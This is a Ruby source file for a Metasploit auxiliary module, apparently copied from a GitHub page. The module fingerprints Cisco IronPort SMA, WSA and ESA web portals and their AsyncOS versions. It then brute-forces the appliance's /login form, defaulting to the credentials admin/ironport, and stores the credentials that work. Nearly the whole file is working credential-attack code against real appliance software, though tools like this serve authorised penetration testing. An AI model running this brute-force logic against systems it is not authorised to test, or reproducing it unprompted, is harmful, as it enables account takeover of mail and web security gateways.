/
cisco_ironport_enum.rb
158 lines (134 loc) · 4.67 KB
/
cisco_ironport_enum.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco Ironport Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco Ironport SMA, WSA and ESA web login portals, finds AsyncOS
versions, and performs login brute force to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, "A specific username to authenticate as", "admin"]),
OptString.new('PASSWORD', [true, "A specific password to authenticate with", "ironport"])
])
end
def run_host(ip)
unless check_conn?
print_error("#{rhost}:#{rport} - Connection failed, Aborting...")
return
end
unless is_app_ironport?
print_error("#{rhost}:#{rport} - Application does not appear to be Cisco Ironport. Module will not continue.")
return
end
print_status("#{rhost}:#{rport} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
def check_conn?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
if res
print_good("#{rhost}:#{rport} - Server is responsive...")
return true
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
end
false
end
#
# What's the point of running this module if the app actually isn't Cisco IronPort
#
def is_app_ironport?
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
if res && res.get_cookies
cookie = res.get_cookies
res = send_request_cgi(
{
'uri' => "/help/wwhelp/wwhimpl/common/html/default.htm",
'method' => 'GET',
'cookie' => cookie
})
if (res and res.code == 200 and res.body.include?('Cisco IronPort AsyncOS'))
version_key = /Cisco IronPort AsyncOS (.+? )/
version = res.body.scan(version_key).flatten[0].gsub('"','')
product_key = /for (.*)</
product = res.body.scan(product_key).flatten[0]
if (product == 'Security Management Appliances')
p_name = 'Cisco IronPort Security Management Appliance (SMA)'
print_good("#{rhost}:#{rport} - Running Cisco IronPort #{product} (SMA) - AsyncOS v#{version}")
elsif ( product == 'Cisco IronPort Web Security Appliances' )
p_name = 'Cisco IronPort Web Security Appliance (WSA)'
print_good("#{rhost}:#{rport} - Running #{product} (WSA) - AsyncOS v#{version}")
elsif ( product == 'Cisco IronPort Appliances' )
p_name = 'Cisco IronPort Email Security Appliance (ESA)'
print_good("#{rhost}:#{rport} - Running #{product} (ESA) - AsyncOS v#{version}")
end
return true
else
return false
end
else
return false
end
end
def service_details
super.merge({service_name: 'Cisco IronPort Appliance'})
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/login',
'method' => 'POST',
'vars_post' =>
{
'action' => 'Login',
'referrer' => '',
'screen' => 'login',
'username' => user,
'password' => pass
}
})
if res and res.get_cookies.include?('authenticated=')
print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
store_valid_credential(user: user, private: pass, proof: res.get_cookies.inspect)
return :next_user
else
vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
return :abort
end
end
end